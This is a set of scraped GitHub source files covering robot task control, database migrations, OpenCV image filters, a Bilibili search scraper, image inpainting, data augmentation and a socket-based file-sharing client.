writer.writerows(myData)\n\n#############################################################\n\ndef csv_reader(file_obj):\n\n reader = csv.reader(file_obj)\n task_queue = []\n num = 0\n\n for row in reader:\n if (num != 0):\n task_queue.append(row[1])\n num = num +1\n\n return task_queue\n\n#################################################################\n\ndef controller(robot_input, start_time):\n\n print (' ------ Robot input------ ', robot_input)\n query_res = 
Query_search(robot_input) ##### query - 1\n product = []\n robots = []\n\n if (query_res == False):\n print ('--- robot start exploration -----')\n explore_res = explore(robot_input) ##### query - 2\n\n if (explore_res == False):\n print (\" ------ no object found of that kind ----- \")\n\n\n else:\n print (\"---- Again searching for the details of object in the warehouse -----\")\n search_2 = Query_search(robot_input) ##### query - 3\n\n if (search_2 == False):\n print (\"---- Object not found ------\")\n\n\n else:\n time.sleep(10)\n product, robots = query_main(robot_input) ##### query - 4\n\n else:\n print ('------ result output -------------')\n product, robots = query_main(robot_input) ##### query - 2\n\n ###################################################################################\n robot_query_end_time = time.time()\n #######################################\n robot_decision_start_time = time.time()\n\n if (robots == None):\n des_end_time = time.time()\n print (\"----- Nothing found no task can be executed -------\")\n\n\n else:\n print (\"---- decising the task -----\")\n exe_res, start_time, query_end_time, decision_start_time, des_end_time = robot_work_cal(product, robots, robot_input, start_time, robot_query_end_time, robot_decision_start_time)\n\n if (exe_res == True):\n print (\"--------object will be delivered at destination--------\")\n\n else:\n print (\"------object fail to deliver at the destination------\")\n\n ###########################\n\n net_time = [[robot_input, Robot_self_name, start_time, query_end_time, decision_start_time, des_end_time]]\n robo_time_write_csv(Time_store_file_path, net_time)\n\n\n#############################\n\nif __name__ == '__main__':\n\n######################################################\n\n csv_path = Input_csv_path\n task_queue = []\n\n with open(csv_path, \"rb\") as f_obj:\n task_queue = csv_reader(f_obj)\n\n for i in range(0, len(task_queue), 1):\n task_main = task_queue[i]\n print (\"-------Starting a New Task ---------\")\n task_start_time = time.time()\n controller(str(task_main), task_start_time)\n\n\n#########################################################","repo_name":"papan1993/Projects","sub_path":"Distributed_Robot_System/robot_system/main_controller.py","file_name":"main_controller.py","file_ext":"py","file_size_in_byte":3335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74660975608","text":"\"\"\"empty message\n\nRevision ID: fc2eeba8e8e8\nRevises: ae7809eb2557\nCreate Date: 2020-02-06 18:17:11.218770\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fc2eeba8e8e8'\ndown_revision = 'ae7809eb2557'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('credit_transfer', sa.Column('exclude_from_limit_calcs', sa.Boolean(), nullable=True))\n op.add_column('kyc_application', sa.Column('multiple_documents_verified', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('kyc_application', 'multiple_documents_verified')\n op.drop_column('credit_transfer', 'exclude_from_limit_calcs')\n # ### end Alembic commands ###\n","repo_name":"teamsempo/SempoBlockchain","sub_path":"app/migrations/versions/fc2eeba8e8e8_.py","file_name":"fc2eeba8e8e8_.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"77"} +{"seq_id":"29062823911","text":"import numpy as np\r\nimport cv2 as cv\r\n\r\ndef filter(k, img):\r\n m = int(np.floor(len(k) / 2))\r\n n = int(np.floor(len(list(zip(*k)))) / 2)\r\n rows, cols = img.shape # no of rows and cols\r\n filtered_img = np.zeros((rows, cols), np.uint8) # new integer image is created\r\n for i in range(m, rows - m):\r\n for j in range(n, cols - n):\r\n sum = 0\r\n for x in range(-m, m + 1, 1):\r\n for y in range(-n, n + 1, 1):\r\n sum = sum + (img[i + x, j + y] * k[m + x][n + y]) # sum of product of kernal elements with corresponding image elements\r\n filtered_img[i, j] = abs(sum)\r\n return filtered_img\r\n\r\nfilepath=\"Ch3-images/goggles.jpg\"\r\nimg = cv.imread(filepath,0)\r\nk1 = [[0, 1, 0], [1, -4, 1], [0, 1, 0]]\r\nk2= [[0, -1, 0], [-1, 4, -1], [0, -1, 0]]\r\nk3 = [[1, 1, 1], [1, -8, 1], [1, 1, 1]]\r\nk4= [[-1, -1, -1], [-1,8, -1], [-1, -1, -1]]\r\n\r\nimg1 = filter(k1, img)\r\nimg2 = filter(k2, img)\r\nimg3 = filter(k3, img)\r\nimg4 = filter(k4, img)\r\nimgs=np.hstack((img,img1, img2, img3, img4))\r\ncv.imshow(\"A)Original image B)Laplacian1 C)Laplacian2 D)Laplacian3 E)Laplacian4\",imgs)\r\ncv.waitKey(0)","repo_name":"supriyo1598/DIP_PRACTICAL_OPENCV","sub_path":"P-3-36-LaplacianKernals.py","file_name":"P-3-36-LaplacianKernals.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"28948068558","text":"# 搜索模块\nimport requests\nimport json\nimport re\n\n\n# duration : 时长\n# title : 视频标题\n# author : 作者\n# tag : 标签\n# arcurl : 地址\nclass Search:\n keyword = ''\n result_list = []\n display_list = [] # 拿给窗口显示用的\n\n def __init__(self, keyword: str):\n if keyword != '':\n self.keyword = keyword\n self.result_list = self.search_video(keyword=keyword) # 获得搜索结果\n self.get_display_style()\n\n def get_url(self, order: int):\n # 通过序号获得url\n return self.result_list[order]['arcurl']\n\n def get_display_style(self):\n # 获得给窗口显示用的结果列表\n for res in self.result_list:\n # 标题 作者 时长 标签\n dis = res['title'] + ' ' + res['author'] + ' ' + res['duration'] + ' ' + res['tag']\n self.display_list.append(dis)\n\n def search_video(self, keyword):\n headers_ = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36 Edg/101.0.1210.32',\n 'referer': 'https://www.bilibili.com',\n }\n\n url = 'https://api.bilibili.com/x/web-interface/search/type?__refresh__=true&_extra=&context=&page=1&page_size=50&from_source=&from_spmid=333.337&platform=pc&highlight=1&single_column=0&keyword=' + keyword + '&category_id=&search_type=video&dynamic_offset=0&preload=true&com2co=true'\n\n page_text = requests.get(url=url, headers=headers_).text\n data_dict = json.loads(page_text)\n result_list = data_dict['data']['result'] # 获得结果的列表\n # 将结果中的标题格式化\n for result in result_list:\n result['title'] = self.get_tit(result['title'])\n\n return result_list # 返回搜索到的列表\n\n # def search_person(name:str):\n\n # def person_videos(id:str):\n #\n\n def get_tit(self, resp: str):\n rule = r'(.*?)(.*?)(.*?)'\n\n try:\n 
tit_list = re.findall(rule, resp)[0]\n\n result_ = ''\n for tit in tit_list:\n result_ = result_ + tit\n return result_\n except:\n return resp\n\n# if __name__ == '__main__':\n# se = search('新宝岛')\n# print(se.result_list[0]['arcurl'])\n","repo_name":"MemoryController/bilibili-","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2584836534","text":"# Lê Bảo Khương - 20146123\r\n\r\nimport cv2 #opencv để xử lí ảnh\r\nimport numpy as np #tính toán ma trận\r\nfrom PIL import Image\r\nimport math\r\n\r\n#----------------------------------------------------------------------------------------------------------------------------------------------\r\n# các hàm con\r\n# def < tên hàm con > ( thông tin input )\r\n\r\ndef shp(imgPIL):\r\n \r\n # tạo 1 khung ảnh để chứa bitmap sau khi làm mượt\r\n sharp= Image.new(imgPIL.mode, imgPIL.size)\r\n \r\n # tạo ma trận thay thế hệ số c = -1 \r\n alterMatrix= np.array([[0,-1,0],[-1,4,-1],[0,-1,0]])\r\n \r\n # lấy kích thước ảnh\r\n w= imgPIL.size[0] \r\n h= imgPIL.size[1] \r\n \r\n # nhân ma trận thay thế thay vì tính laplacian\r\n for x in range (1,w-1): \r\n for y in range (1,h-1):\r\n \r\n rs= 0\r\n gs= 0\r\n bs= 0\r\n \r\n sr= 0\r\n sg= 0\r\n sb= 0\r\n \r\n # quét các điểm trong mặt nạ\r\n for i in range (x-1,x+2):\r\n for j in range (y-1,y+2):\r\n \r\n # giá trị điểm ảnh tại từng pixel\r\n R , G , B = imgPIL.getpixel((i,j))\r\n \r\n # cộng dồn giá trị\r\n rs+= R*alterMatrix[i-x+1,j-y+1]\r\n gs+= G*alterMatrix[i-x+1,j-y+1]\r\n bs+= B*alterMatrix[i-x+1,j-y+1]\r\n \r\n # tính f(x,y)\r\n R1, G1, B1= imgPIL.getpixel((x,y)) \r\n \r\n sr= R1 + rs\r\n sg= G1 + gs\r\n sb= B1 + bs\r\n\r\n if (sr<0):\r\n sr= 0\r\n elif (sr> 255):\r\n sr= 255\r\n \r\n if (sg<0):\r\n sg= 0\r\n elif (sg> 255):\r\n sg= 255\r\n \r\n if (sb<0):\r\n sb= 0\r\n elif (sb> 255):\r\n sb= 255\r\n \r\n sharp.putpixel((x,y),(sb,sg,sr))\r\n \r\n return sharp\r\n\r\n#----------------------------------------------------------------------------------------------------------------------------------------------\r\n# main\r\n\r\n# mở file hình = đường dẫn\r\n#filehinh= r'astley.png'\r\nfilehinh= r'bird_small.jpg'\r\nimg= cv2.imread(filehinh,cv2.IMREAD_COLOR) \r\n\r\n# đọc ảnh = pillow\r\nimgPIL= Image.open(filehinh)\r\n\r\n# làm sắc nét ảnh\r\nshp3= shp(imgPIL) \r\n\r\n# chuyển ảnh từ pillow -> opencv\r\nshp3cv= np.array(shp3)\r\n\r\ncv2.imshow('Original',img)\r\ncv2.imshow('3x3',shp3cv)\r\n\r\n#----------------------------------------------------------------------------------------------------------------------------------------------\r\n#esc = phím bất kì\r\ncv2.waitKey (0)\r\n\r\n#giải phóng bộ nhớ dùng để hiển thị hình\r\ncv2.destroyAllWindows() \r\n","repo_name":"sweetiepickle/machine-vision-python","sub_path":"MP12-sharpening.py","file_name":"MP12-sharpening.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27925591437","text":"import pandas as pd\nimport streamlit as st\n\nscreen_df = pd.read_csv('/Users/wendyarias/Documents/GitHub/dashboard-streamlit/ScreenTime.csv')\nphone_df = pd.read_csv('/Users/wendyarias/Documents/GitHub/dashboard-streamlit/telephony2.csv')\n### this is a header\nst.header(\"Group Project Data\")\nst.caption(\"visual representation of data\")\n\n### to display \nif st.checkbox('Show Screen Time'):\n 
st.table(screen_df)\n\nif st.checkbox('Show Telephone Data'):\n st.table(phone_df)\n\n## barchart\nst.subheader(\"Screen Time Data\")\nscreen_bat_tot = screen_df['battery_level'].value_counts()\nst.bar_chart(screen_bat_tot)\nst.caption(\"A representation of phones battery level \") \n\n## line chart\nst.subheader('Visual of Call type')\ncall_type = phone_df['type']\nst.line_chart(call_type)\nst.caption(\" a representation of the types of calls made daily\")\n\n\n### code block\ncode = '''\nst.subheader(\"Screen Time Data\")\nscreen_bat_tot = screen_df['battery_level'].value_counts()\nst.bar_chart(screen_bat_tot)\nst.caption(\"A representation of phones battery level \") \n'''\nst.code(code, language='python')\nst.caption(\"code used to make barchart\")\n#pip3 install pipenv\n#pip3 install env\n#sudo -H pip install -U pipenv in shh do pip install pipenv\n#pipenv shell\n#pip3 install streamlit\n","repo_name":"win-n-nie/dashboard-streamlit","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29781769378","text":"## CSC320 Winter 2019 \n## Assignment 2\n## (c) Kyros Kutulakos\n##\n## DISTRIBUTION OF THIS CODE ANY FORM (ELECTRONIC OR OTHERWISE,\n## AS-IS, MODIFIED OR IN PART), WITHOUT PRIOR WRITTEN AUTHORIZATION \n## BY THE INSTRUCTOR IS STRICTLY PROHIBITED. VIOLATION OF THIS \n## POLICY WILL BE CONSIDERED AN ACT OF ACADEMIC DISHONESTY\n\n##\n## DO NOT MODIFY THIS FILE ANYWHERE EXCEPT WHERE INDICATED\n##\n\nimport numpy as np\nimport cv2 as cv\n\n# File psi.py define the psi class. You will need to \n# take a close look at the methods provided in this class\n# as they will be needed for your implementation\nimport psi \n\n# File copyutils.py contains a set of utility functions\n# for copying into an array the image pixels contained in\n# a patch. These utilities may make your code a lot simpler\n# to write, without having to loop over individual image pixels, etc.\nimport copyutils\n\n#########################################\n## PLACE YOUR CODE BETWEEN THESE LINES ##\n#########################################\n\n# If you need to import any additional packages\n# place them here. Note that the reference \n# implementation does not use any such packages\n\n#########################################\n\n\n#########################################\n#\n# Computing the Patch Confidence C(p)\n#\n# Input arguments: \n# psiHatP: \n# A member of the PSI class that defines the\n# patch. See file inpainting/psi.py for details\n# on the various methods this class contains.\n# In particular, the class provides a method for\n# accessing the coordinates of the patch center, etc\n# filledImage:\n# An OpenCV image of type uint8 that contains a value of 255\n# for every pixel in image I whose color is known (ie. 
either\n# a pixel that was not masked initially or a pixel that has\n# already been inpainted), and 0 for all other pixels\n# confidenceImage:\n# An OpenCV image of type uint8 that contains a confidence \n# value for every pixel in image I whose color is already known.\n# Instead of storing confidences as floats in the range [0,1], \n# you should assume confidences are represented as variables of type \n# uint8, taking values between 0 and 255.\n#\n# Return value:\n# A scalar containing the confidence computed for the patch center\n#\n\ndef computeC(psiHatP=None, filledImage=None, confidenceImage=None):\n assert confidenceImage is not None\n assert filledImage is not None\n assert psiHatP is not None\n\n #########################################\n ## PLACE YOUR CODE BETWEEN THESE LINES ##\n #########################################\n # zero out the unknown pixel\n valid_image = np.divide(np.multiply(filledImage, confidenceImage), 255)\n\n # numerator: sum of the C(q) of all filled pixels in the patch\n # dealing with the case: the patch somehow out of the boundary of the image\n window, valid = copyutils.getWindow(valid_image, psiHatP._coords, psiHatP._w)\n numerator = np.sum(window * valid)\n\n # denominator: the size of the patch\n # valid patch size, i.e.: not out of the boundary of the image\n denominator = np.sum(valid)\n\n # confidences are of type uint8, taking values between 0 and 255.\n C = np.clip((numerator / denominator).astype(np.uint8), 0, 255)\n #########################################\n\n return C\n\n#########################################\n#\n# Computing the max Gradient of a patch on the fill front\n#\n# Input arguments: \n# psiHatP:\n# A member of the PSI class that defines the\n# patch. See file inpainting/psi.py for details\n# on the various methods this class contains.\n# In particular, the class provides a method for\n# accessing the coordinates of the patch center, etc\n# filledImage:\n# An OpenCV image of type uint8 that contains a value of 255\n# for every pixel in image I whose color is known (ie. either\n# a pixel that was not masked initially or a pixel that has\n# already been inpainted), and 0 for all other pixels\n# inpaintedImage:\n# A color OpenCV image of type uint8 that contains the \n# image I, ie. the image being inpainted\n#\n# Return values:\n# Dy: The component of the gradient that lies along the \n# y axis (ie. the vertical axis).\n# Dx: The component of the gradient that lies along the \n# x axis (ie. 
the horizontal axis).\n#\n\ndef computeGradient(psiHatP=None, inpaintedImage=None, filledImage=None):\n assert inpaintedImage is not None\n assert filledImage is not None\n assert psiHatP is not None\n\n #########################################\n ## PLACE YOUR CODE BETWEEN THESE LINES ##\n #########################################\n # OpenCV function converts color image to grayscale image\n gray = cv.cvtColor(inpaintedImage, cv.COLOR_BGR2GRAY)\n\n # OpenCV function computes horizontal and vertical component of the gradient\n # 3x3 Scharr filter is used which gives better results than 3x3 Sobel filter\n Dx = cv.Scharr(gray, cv.CV_64F, 1, 0)\n Dy = cv.Scharr(gray, cv.CV_64F, 0, 1)\n\n # zero out the unknown pixel\n Dx_valid = np.divide(np.multiply(Dx, filledImage), 255.)\n Dy_valid = np.divide(np.multiply(Dy, filledImage), 255.)\n\n # Dealing the case, the patch somehow out of the boundary of the image\n windowDx, validDx = copyutils.getWindow(Dx_valid, psiHatP._coords, psiHatP._w)\n windowDy, validDy = copyutils.getWindow(Dy_valid, psiHatP._coords, psiHatP._w)\n\n # focus on the pixels inside the patch\n Dx_patch = np.array(windowDx * validDx)\n Dy_patch = np.array(windowDy * validDy)\n\n # combine Dx and Dy to the total gradient\n D_patch = np.power(Dx_patch, 2) + np.power(Dy_patch, 2)\n\n Dx = Dx_patch.item(np.argmax(D_patch))\n Dy = Dy_patch.item(np.argmax(D_patch))\n #########################################\n\n return Dy, Dx\n\n#########################################\n#\n# Computing the normal to the fill front at the patch center\n#\n# Input arguments: \n# psiHatP: \n# A member of the PSI class that defines the\n# patch. See file inpainting/psi.py for details\n# on the various methods this class contains.\n# In particular, the class provides a method for\n# accessing the coordinates of the patch center, etc\n# filledImage:\n# An OpenCV image of type uint8 that contains a value of 255\n# for every pixel in image I whose color is known (ie. either\n# a pixel that was not masked initially or a pixel that has\n# already been inpainted), and 0 for all other pixels\n# fillFront:\n# An OpenCV image of type uint8 that whose intensity is 255\n# for all pixels that are currently on the fill front and 0 \n# at all other pixels\n#\n# Return values:\n# Ny: The component of the normal that lies along the \n# y axis (ie. the vertical axis).\n# Nx: The component of the normal that lies along the \n# x axis (ie. the horizontal axis).\n#\n# Note: if the fill front consists of exactly one pixel (ie. the\n# pixel at the patch center), the fill front is degenerate\n# and has no well-defined normal. 
In that case, you should\n# set Nx=None and Ny=None\n#\n\ndef computeNormal(psiHatP=None, filledImage=None, fillFront=None):\n assert filledImage is not None\n assert fillFront is not None\n assert psiHatP is not None\n\n #########################################\n ## PLACE YOUR CODE BETWEEN THESE LINES ##\n #########################################\n window, valid = copyutils.getWindow(fillFront, psiHatP._coords, psiHatP._w)\n valid_window = np.array(window * valid)\n\n if np.count_nonzero(valid_window) == 1:\n Nx = None\n Ny = None\n else:\n # get the gradient kernel w.r.t a and y direction\n sobel3x = np.array(cv.getDerivKernels(1, 0, 3))\n sobel3y = np.array(cv.getDerivKernels(0, 1, 3))\n\n # use convolution to get the gradient on x and y direction\n xGradient = np.array(cv.filter2D(valid_window, cv.CV_64F, sobel3x))\n yGradient = np.array(cv.filter2D(valid_window, cv.CV_64F, sobel3y))\n\n # only focus on the center pixel\n center_index = (window.size - 1) / 2\n dx = xGradient.item(center_index)\n dy = yGradient.item(center_index)\n norm = (dx ** 2 + dy ** 2) ** (1 / 2)\n\n Nx = dx / norm\n Ny = dy / norm\n #########################################\n\n return Ny, Nx","repo_name":"syhAnna/Introduction-to-computer-vision","sub_path":"intro_to_cv/A2/code/inpainting/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":8519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13408597492","text":"n, k1, k2, s = (int(x) for x in input().split())\ncount = [[0 for _ in range(n+1)] for _ in range(n+1)]\ncount[k1][k2] = 2**100\nfor i1 in range(k1, n):\n for i2 in range(k2, n):\n count[i1+1][i2] += count[i1][i2] // 2\n count[i1][i2+1] += count[i1][i2] // 2\n\ns1 = 0; s2 = 0;\nfor i in range(n+1): s1 += count[i][n];\nfor i in range(n+1): s2 += count[n][i];\nassert(s1+s2 == 2**100)\ns1 = s * s1 // 2**100\ns2 = s * s2 // 2**100\nprint(s2, s1, end = ' ')\n","repo_name":"dmkz/competitive-programming","sub_path":"acmp.ru/0506.py","file_name":"0506.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"77"} +{"seq_id":"22873489039","text":"import cv2\nimport numpy as np\nfrom torchvision.transforms import ColorJitter\nfrom PIL import Image\n\n\nclass Compose(object):\n def __init__(self, transforms):\n self.transforms = transforms\n\n def __call__(self, img, kpts=None):\n for t in self.transforms:\n img, kpts = t(img, kpts)\n if kpts is None:\n return img\n else:\n return img, kpts\n\n def __repr__(self):\n format_string = self.__class__.__name__ + \"(\"\n for t in self.transforms:\n format_string += \"\\n\"\n format_string += \" {0}\".format(t)\n format_string += \"\\n)\"\n return format_string\n\n\nclass ToTensor(object):\n def __call__(self, img, kpts):\n return img / 255., kpts\n\n\nclass Normalize(object):\n def __init__(self, mean, std):\n self.mean = mean\n self.std = std\n\n def __call__(self, img, kpts):\n img -= self.mean\n img /= self.std\n return img, kpts\n\n\nclass JpegCompress(object):\n def __init__(self, quality_low=15, quality_high=75):\n self.quality_low = quality_low\n self.quality_high = quality_high\n\n def __call__(self, img, kpts):\n if np.random.uniform(0, 1) < 0.5:\n return img, kpts\n\n quality = np.random.randint(self.quality_low, self.quality_high)\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), quality]\n result, encimg = cv2.imencode('.jpg', img, encode_param)\n img = cv2.imdecode(encimg, 1)\n return img, 
kpts\n\n\nclass GaussianBlur(object):\n    def __init__(self, blur_range=(3, 5, 7, 9, 11)):\n        self.blur_range = blur_range\n\n    def __call__(self, img, kpts):\n        if np.random.uniform(0, 1) < 0.5:\n            return img, kpts\n\n        # cv2.GaussianBlur needs the kernel size as a plain odd int, not a length-1 array\n        ksize = int(np.random.choice(self.blur_range, p=(0.4, 0.3, 0.2, 0.05, 0.05)))\n        return cv2.GaussianBlur(img, (ksize, ksize), 0), kpts\n\n\nclass AddNoise(object):\n    def __call__(self, img, kpts):\n        if np.random.uniform(0, 1) < 0.66:\n            return img, kpts\n\n        # gaussian noise\n        if np.random.uniform(0, 1) < 0.75:\n            row, col, ch = img.shape\n            mean = 0\n            var = np.random.rand(1) * 0.3 * 256\n            sigma = var**0.5\n            gauss = sigma * np.random.randn(row,col) + mean\n            gauss = np.repeat(gauss[:, :, np.newaxis], ch, axis=2)\n            img = img + gauss\n            img = np.clip(img, 0, 255)\n            img = img.astype(np.uint8)\n        else:\n            # motion blur\n            sizes = [3, 5, 7, 9]\n            size = sizes[int(np.random.randint(len(sizes), size=1))]\n            kernel_motion_blur = np.zeros((size, size))\n            if np.random.rand(1) < 0.5:\n                kernel_motion_blur[int((size-1)/2), :] = np.ones(size)\n            else:\n                kernel_motion_blur[:, int((size-1)/2)] = np.ones(size)\n            kernel_motion_blur = kernel_motion_blur / size\n            img = cv2.filter2D(img, -1, kernel_motion_blur)\n\n        return img, kpts\n\n\nclass Jitter(object):\n    def __init__(self, brightness=0.5, contrast=0.2, saturation=0.2, hue=0.2):\n        self.jitter = ColorJitter(brightness, contrast, saturation, hue)\n\n    def __call__(self, img, kpts):\n        if np.random.uniform(0, 1) < 0.66:\n            return img, kpts\n\n        img = np.asarray(self.jitter(Image.fromarray(img)))\n        return img, kpts\n","repo_name":"zhixuan-lin/descriptor-space","sub_path":"lib/data/transforms/transforms.py","file_name":"transforms.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23783806552","text":"import sys\n\n\ndef solution(cur):\n    global eggs\n    global answer\n\n    count = 0\n    for egg in eggs:\n        if egg[0] <= 0:\n            count += 1\n    answer = max(answer, count)\n\n    if cur == len(eggs):\n        return\n\n    if eggs[cur][0] <= 0:\n        solution(cur+1)\n        return\n\n    for i in range(len(eggs)):\n        if i == cur or eggs[i][0] <= 0:\n            continue\n        eggs[cur][0] -= eggs[i][1]\n        eggs[i][0] -= eggs[cur][1]\n        solution(cur+1)\n        eggs[cur][0] += eggs[i][1]\n        eggs[i][0] += eggs[cur][1]\n\n\nif __name__ == \"__main__\":\n    N = int(sys.stdin.readline().rstrip())\n    answer = 0\n    eggs = [list(map(int, sys.stdin.readline().split())) for _ in range(N)]\n    solution(0)\n    print(answer)\n","repo_name":"pangpang-study/algorithm-coding-test-study","sub_path":"nyc/211116/baekjoon_16987_계계치.py","file_name":"baekjoon_16987_계계치.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"28747954079","text":"import datastorage\nimport time\nimport numpy as np\nimport progressbar\n\ndef take_data(Npulse=10):\n    import lecroy\n    scope=lecroy.LeCroyScope(\"10.0.0.1\")\n    Nsamples = scope.get_waveform(2)[1].shape[0]\n    ch2 = np.zeros( (Npulse,Nsamples) )\n    t0 = time.time()\n    p = progressbar.ProgressBar(Npulse)\n    p.start()\n    for i in range(Npulse):\n        scope.trigger()\n        ch2[i] = scope.get_waveform(2)[1]\n#        ch4[i] = scope.get_waveform(4)[1]\n        p.update(i)\n        #print((i+1)/(time.time()-t0))\n    p.finish()\n    return datastorage.DataStorage( t = scope.get_xaxis(), ch2 = ch2)\n\ndef ana(fname):\n    data=datastorage.DataStorage(fname)\n    ch3 = data.ch3[:,12000:24000]\n    ch3_base = ch3[:,:2000].mean(1)\n    ch3 = ch3 - ch3_base[:,np.newaxis]\n    ch4 = 
data.ch4[:,12000:24000]\n    ch4_base = ch4[:,:2000].mean(1)\n    ch4 = ch4 - ch4_base[:,np.newaxis]\n    ch3_sum = ch3.sum(axis=1)\n    ch4_sum = ch4.sum(axis=1)\n    return ch3_sum,ch4_sum\n    \n","repo_name":"marcocamma/openlab","sub_path":"openlab/oscilloscopes/lecroy/lecroy_collect.py","file_name":"lecroy_collect.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73785537527","text":"#Name:Amartejas Manjunath\r\n#ID no: 1001742606\r\n\r\nimport socket # To create socket\r\nimport sys # system commands\r\nimport os # create directory\r\nimport PySimpleGUI as sg # for GUI\r\nimport threading # for threading\r\nimport queue # for monitor\r\nimport time\r\nimport itertools\r\nimport numpy as np # to generate random number\r\nfrom watchdog.observers import Observer # For watchdog to watch\r\nfrom watchdog.events import FileSystemEventHandler # for watchdog\r\nimport glob\r\n\r\nfname = \"\"\r\nval = \"\"\r\npaths = []\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((socket.gethostname(), 8585))\r\nprob = \"11\"\r\n#count = 0\r\n\r\n# A class to take action when a file is added to the shared directory\r\n\r\nclass Myhandler(FileSystemEventHandler):\r\n    @staticmethod\r\n    def on_any_event(event):\r\n        if event.is_directory:\r\n            return None\r\n        elif event.event_type == 'created': # An event fired when a file is uploaded to the shared directory\r\n            # Take any action here when a file is first created.\r\n            print(\"Received created event - %s\" % event.src_path)\r\n            #paths.append(event.src_path)\r\n            sg.PopupTimed('File updated in Directory', auto_close_duration=8, non_blocking=True)\r\n            sendfile(event.src_path) # send the file path detected to sendfile function to send the file to server\r\n        elif event.event_type == 'deleted':\r\n            print(\"Deleted\")\r\n            pd = event.src_path\r\n            print(pd)\r\n            td = threading.Thread(target=delete, daemon=True, args=(pd, ))\r\n            td.start()\r\n\r\ndef delete2():\r\n    print(\"voting to delete or not\")\r\n    time.sleep(3)\r\n    prob = np.random.randint(2, size=1)\r\n    prob = prob[0]\r\n    print(prob)\r\n    prob = str(prob)\r\n    prob = bytes(prob, encoding=\"utf-8\")\r\n    s.send(prob)\r\n    print(\"vote sent\")\r\ndef delete(fname1):\r\n    messa = val + ' is coordinator'\r\n    sg.PopupTimed(messa, auto_close_duration=3, non_blocking=True)\r\n    fname1 = fname1.split(val)[1]\r\n    fname1 = fname1.replace(\"\\\\\", \"\")\r\n    text = \"vote&\" + fname1\r\n    print(text)\r\n    text = bytes(text, encoding=\"utf-8\")\r\n    s.send(text)\r\n\r\n# This Function is used to send the username to the server to check for duplicates and create a directory with the user.\r\n\r\ndef conn(usr):\r\n    username = str(usr) # Save the username\r\n    print(username)\r\n    username = bytes(username, encoding='utf8') # convert the username to bytes to send\r\n    s.send(username) # send the username to server to check\r\n    reply = s.recv(1024) # Receive the reply from server about the username\r\n    reply1 = reply.decode(\"utf8\") # convert the sent data to string\r\n    print(\"reply1\", reply1)\r\n    if reply1 == \"connected\": # check if connected\r\n        print(\"Connected\")\r\n        sg.PopupTimed('Connected', auto_close_duration=8, non_blocking=True) # using GUI to pop a window to show connected\r\n        if not os.path.exists(username):\r\n            os.mkdir(username, 0o777) # if a directory of the same name does not exist, create it (mode must be octal)\r\n        tt = threading.Thread(target=monitor, args=(username,), daemon=True) # Start a thread to monitor the shared directory\r\n        
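# daemon=True so the watcher thread exits with the main program instead of blocking interpreter shutdown\r\n        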
tt.start()\r\n        #tt.join()\r\n        #monitor(username)\r\n    else:\r\n        sg.PopupTimed('Change Username', auto_close_duration=8, non_blocking=True)\r\n# This function stops the client from sending files in a loop, so the client will not re-send files that it received from the server\r\n\r\n# also send file to server which was put in shared directory\r\n\r\ndef sendfile(filename):\r\n    if \"received\" in filename:\r\n        return\r\n    print(\"filename:\", filename)\r\n    file = open(filename, 'r') # open file in read mode from the shared directory\r\n    data = file.read(1024) # read the file\r\n    data = str.encode(data) # encode the file to send\r\n    print(\"data\", data)\r\n    filename = bytes(filename, encoding=\"utf-8\")\r\n    s.send(filename)\r\n    s.send(data) # Send data to the server\r\n    print(\"sent\")\r\n\r\n\r\n# This function is part of the watchdog library which monitors a folder\r\n# https://www.michaelcho.me/article/using-pythons-watchdog-to-monitor-changes-to-a-directory\r\n# Also sending the file in shared directory, to the server\r\n\r\ndef monitor(usr1):\r\n    usr1 = usr1.decode(\"utf8\")\r\n    event_handler = Myhandler() # Assigning handler class\r\n    observer = Observer() # assign observer class\r\n    pathFile = r\"C:\\Users\\Amar\\Project\" + \"\\\\\" + usr1 # assigning the shared directory to be watched\r\n    #paths.append(usr1)\r\n    observer.schedule(event_handler, path=pathFile, recursive=False) # schedule class to set up watcher\r\n    observer.start() # start the watcher\r\n    print(\"Receiving\")\r\n    try:\r\n        while True:\r\n            time.sleep(1) # keep checking every second\r\n            filename12 = s.recv(1024) # waiting for invalidation\r\n            filename12 = filename12.decode(\"utf-8\")\r\n            print(\"down\", filename12)\r\n            if \"deleting file\" in filename12:\r\n                global fname\r\n                fname = filename12.split(\"&\")[1]\r\n                td2 = threading.Thread(target=delete2, daemon=True)\r\n                td2.start()\r\n            elif filename12 == 